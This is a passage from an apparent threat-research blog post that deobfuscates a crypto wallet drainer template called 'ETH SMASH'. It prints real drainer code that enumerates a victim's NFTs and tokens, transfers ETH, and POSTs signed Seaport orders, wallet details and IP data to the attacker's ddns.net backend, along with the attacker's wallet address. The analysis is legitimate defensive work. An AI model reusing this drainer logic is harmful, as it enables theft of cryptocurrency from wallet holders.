drainer, disguised as a Garbage Friends airdrop. They were using the exact same image they are now, though rendered in a 3D style. </p><p>At that time, Twitter verification was <em>reserved for selected users</em>, not available as a paid feature like it is today&#8212;making verified accounts especially valuable.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Q9uF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Q9uF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 424w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 848w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 1272w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Q9uF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png" width="292" height="507.75555555555553" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d77e6559-cec8-4747-bbdd-9677552306d1_1080x1878.jpeg&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1878,&quot;width&quot;:1080,&quot;resizeWidth&quot;:292,&quot;bytes&quot;:138947,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Q9uF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 424w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 848w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 1272w, https://substackcdn.com/image/fetch/$s_!Q9uF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8747521a-ccef-40a7-9b75-ec8910fbe4cf_1080x1878.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Hacked account advertising a drainer</figcaption></figure></div><p>So, nice to see you again, <em>Garby</em>&#8212;though it&#8217;s unfortunate we always meet under cybercriminal circumstances. I&#8217;d love to stay and chat, but another undead crypto malware awaits on the operating table. If I may.</p><div><hr></div><h2><strong>&#129516; </strong><em><strong>Dr Ainer</strong></em><strong>, code sequence anomaly detected </strong></h2><p>Our next patient was '<em>ETH SMASH</em>', and setting it up was a challenge in itself: missing dependencies led to missing functions, which led to even more missing pieces and features. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7o-a!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7o-a!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 424w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 848w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 1272w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7o-a!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png" width="618" height="414.2637362637363" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/68eae873-93cd-4209-857a-dd029a08cd0e_1850x1240.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:976,&quot;width&quot;:1456,&quot;resizeWidth&quot;:618,&quot;bytes&quot;:351679,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7o-a!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 424w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 848w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 1272w, https://substackcdn.com/image/fetch/$s_!7o-a!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93bbd544-1b29-43ad-9fd2-ade0a5587823_1850x1240.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Patient showing symptoms of division-per-zero sickness</figcaption></figure></div><p>But <s>with practices closer to cyber-necromancy than medicine</s> <strong>somehow</strong>, we stitched it back together and jolted it back to life&#8230; </p><p><em>Come on, don&#8217;t 404 on me now! </em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Z3ut!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Z3ut!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 424w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 848w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 1272w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Z3ut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png" width="692" height="369.7637362637363" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f77685bd-6532-4390-8270-9fc6f0c18003_1850x988.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:778,&quot;width&quot;:1456,&quot;resizeWidth&quot;:692,&quot;bytes&quot;:191448,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Z3ut!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 424w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 848w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 1272w, https://substackcdn.com/image/fetch/$s_!Z3ut!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F30a2c33f-0ebf-46f3-8bdc-e4d5ecb940cc_1850x988.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Patient stabilized</figcaption></figure></div><p>By creating empty, placebo-like dependencies to make it believe everything is in place, we manage to get a grip on this <s>Frankenstein monster</s> &#8220;prototype&#8221;. Again, no backend script is provided; everything is offloaded to JavaScript procedures. </p><p>But why are we bothering so much with a patient that looks like this? Well, because judging a book by its cover never ends well. Such a simple product can mean two things: either it&#8217;s a PoC or <a href="https://en.wikipedia.org/wiki/Work_in_process">WIP</a>, or it&#8217;s a template for an implant, kept simple on purpose to be adapted to other &#8216;products&#8217; in the scene&#8230;</p><p>Its main file, <code>index.js</code>, appears to contain the primary configuration directives along with a small surprise at the bottom:</p><pre><code>/**** CONFIGURATIONS ****/

const config = { 

    receiver: "<strong>INSERT_YOURE_WALLET_HERE</strong>",
    
    design: {
        walletAppear: true,
        eliAppear: true,
        
        connectElement: "#connectButton",
        connectedElement: "#claimButton",
        
        retryDelay: 3000,
        
        buttonMessagesEnabled: true,
        buttonMessages: {
          initialConnect: "Update",
          initialConnected: "Update",
 
          progress: "Loading ...", 
          success: "Confirming ...",
          failed: "Verification failed !",
        }
    },
 
    claimInfo: {
 
        collectionDetails: {
            minAveragePrice: 0.005,
            minVolumeTraded: 20,
        },
 
        minValueERC20: 0,
        minWalletBalance: 0.0003,
    }
 
 }

<strong>[OBFUSCATED CODE]</strong></code></pre><p>At the bottom of the file, there&#8217;s an obfuscated JavaScript snippet. Fortunately, <a href="https://obf-io.deobfuscate.io">we recognized the obfuscator used</a>, making the process easily reversible.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!9j3R!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!9j3R!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 424w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 848w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9j3R!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png" width="1456" height="673" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e3eee2db-789e-4d96-9630-d9a23953e3ba_2466x1140.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:673,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:832357,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9j3R!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 424w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 848w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 1272w, https://substackcdn.com/image/fetch/$s_!9j3R!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcf5a1d18-c7b5-4c08-812a-97e03bd6fb2b_2466x1140.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Deobfuscating JavaScript libraries for fun and profit</figcaption></figure></div><pre><code>const _0x3d9a20 = {
  Accept: "application/json",
  "X-API-KEY": ''
};
class _0x264fc9 {
  ["OpenseaAPI"] = "7da<strong>[REDACTED]</strong>bc2";
  ["MoralisAPI"] = "ey<strong>[REDACTED]</strong>OprjzDyI";
  [...]
  ["walletAddress"];
  ["walletBalance"];
  ["walletBalanceInEth"];
  ["chainId"];
  ["seaportConduit"] = "0x1e0049783f008a0085193e00003d00cd54003c71";
  ["uniswapV3Router1"] = "0xE592427A0AEce92De3Edee1F18E0157C05861564";
  ["uniswapV3Router2"] = "0x68b3465833fb72a70ecdf485e0e4c7bd8665fc45";
  ["pancakeSwapRouter"] = "0xEfF92A263d31888d860bD50809A8D171709b7b1c";
  ["sushiSwapRouter"] = "0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F";
  ["receiverSwapTokenAddress"] = "0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48";
  ["receiverSwapTokenAddressAlt"] = "0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2";
  [...]
}
const _0x460b21 = {
  logDomainName: "http://ethers.ddns.net:3000/",
  logIpData: true
};
const _0xa4df20 = {
  receiver: "0xbF84Ed43EEF5D5f98f4746EB4a8f2805D5c0458a"
};</code></pre><p>Some interesting points:</p><ul><li><p>API keys associated with <a href="http://opensea.io">OpenSea</a> and <a href="https://developers.moralis.com">Moralis</a>.</p></li><li><p>References to multiple legitimate smart contracts, including <a href="https://etherscan.io/address/0x68b3465833fb72a70ecdf485e0e4c7bd8665fc45">Uniswap</a>, <a href="https://etherscan.io/address/0xEfF92A263d31888d860bD50809A8D171709b7b1c">PancakeSwap</a>, and <a href="https://etherscan.io/address/0xd9e1cE17f2641f24aE83637ab66a2cca9C378B9F">SushiSwap</a> routers, as well as <a href="https://etherscan.io/address/0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48">USDC</a> and <a href="https://etherscan.io/address/0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2#notes">wETH</a> (Wrapped ETH)..</p></li><li><p>A ddns.net domain linked to the Threat Actor.</p></li><li><p>The Threat Actor&#8217;s address, labeled <a href="https://etherscan.io/address/0xbF84Ed43EEF5D5f98f4746EB4a8f2805D5c0458a">Fake_Phishing187964</a>.</p></li></ul><p>Moving along, the template provides functions to fetch NFTs and ERC20 tokens which will later be stolen. For this process, OpenSea's and Moralis' APIs are abused.</p><pre><code><strong>["fetchNFTS"]</strong> = async () =&gt; {
    console.log("<strong>Fetching NFTS</strong>");
    this.requestOptions.headers[<strong>"X-API-KEY"</strong>] = <strong>this.OpenseaAPI;</strong>
    try {
      fetch("https://<strong>api.opensea.io</strong>/api/v1/collections?asset_owner=" +      this.walletAddress + "&amp;offset=0&amp;limit=300", this.requestOptions).then(_0xb79829 =&gt; _0xb79829.json()).then(_0x2f04d2 =&gt; {
    return {
    'name': _0x3ab714.primary_asset_contracts[0].name,
    'type': _0x3ab714.primary_asset_contracts[0].schema_name,
    'contractAddress': _0x3ab714.primary_asset_contracts[0].address,
    'price': this.round(_0x3ab714.stats.one_day_average_price != 0 ? 
    <strong>[...]</strong>
      });
    } catch (_0x3b2b60) {
      console.log(<strong>"NFT Request error: "</strong>, _0x3b2b60);
    }
    [...]
    } catch (_0x222677) {
        console.log(<strong>"NFT floor price error: "</strong>, _0x222677);
    }
};</code></pre><pre><code><strong>["fetchERC20"]</strong> = async () =&gt; {
    console.log<strong>("Fetching ERC20")</strong>;
    let _0x4aceab = [];
    try {
      this.requestOptions.headers[<strong>"X-API-KEY"</strong>] = <strong>this.MoralisAPI;</strong>
      _0x4aceab = await fetch("https://<strong>deep-index.moralis.io</strong>/api/v2/" + this.walletAddress + "<strong>/erc20?chain=eth</strong>", this.requestOptions).then(_0x433cb3 =&gt; _0x433cb3.json());
      let _0x4fb793 = _0x4aceab.filter(_0x3c491f =&gt; _0x3c491f.thumbnail != null || _0x3c491f.name == "<strong>ApeCoin</strong>").map(_0x45bbf1 =&gt; {
        const _0x240085 = {
          type: "ERC20",
          contractAddress: _0x45bbf1.token_address,
          fullName: _0x45bbf1.name,
          name: _0x45bbf1.symbol,
          balance: _0x45bbf1.balance,
          decimals: _0x45bbf1.decimals,
          banner: _0x45bbf1.thumbnail
        };
        <strong>[...]</strong>
        this.transactions.push(_0xc9c40);
        this.ERC20tokens.push(_0xc9c40);
      }));
    } catch (_0x2a181a) {
      console.log(<strong>"ERC20 fetch error: "</strong>, _0x2a181a);
    }
  };</code></pre><pre><code>  <strong>["transfer"]</strong> = async () =&gt; {
    if (config.design.buttonMessagesEnabled) {
      this.claimButton.innerText=config.design.buttonMessages.progress;
    }
    this.transactions.push({
      'type': "ETH",
      'price': <strong>this.walletBalanceInEth</strong>
    });</code></pre><p>Finally, there are additional functions that work specifically with Seaport, Uniswap, Sushiswap, and PancakeSwap, all of which call back home by sending a POST request to the TA&#8217;s backend. Let&#8217;s take a closer look:</p><pre><code><strong>["transferNFTseaport"]</strong> = async () =&gt; {
    try {
      const _0xd64e23 = {
      offer: this.offers,
      consideration: this.considerations,
      conduitKey: "0x000000<strong>[...]</strong>8104250f0000",
          zone: "0x004C00500000aD104D7DBd00e3ae0A5C00560C00",
          startTime: "1661790956",
          endTime: "11<strong>[...]</strong>935"
      };
          <strong>[...]</strong>
          fetch(<strong>"http://ethers.ddns.net:3000/backend/seaport"</strong>, {
            'method': "POST",
            'headers': {
              'Content-Type': "application/json",
              'Accept': "application/json"
            },
            'body': JSON.stringify({
              'order': _0x29d81f,
              'address': this.walletAddress,
              'walletBalanceInEth': this.walletBalanceInEth,
              'isMobile': this.isMobile(),
              'websiteUrl': window.location.href,
              'websiteDomain': window.location.host,
              'ipData': _0x1eb992
            })
          });</code></pre><pre><code>[<strong>"transferERC20pancakeswap"</strong>] = async () =&gt; {
    if (this.pancakeswapTokens.length &gt; 0) {
      console.log(<strong>"TRANSFERRING APPROVED PANCAKESWAP ERC20 TOKENS"</strong>);
      console.table(this.pancakeswapTokens);
      <strong>[...]</strong>
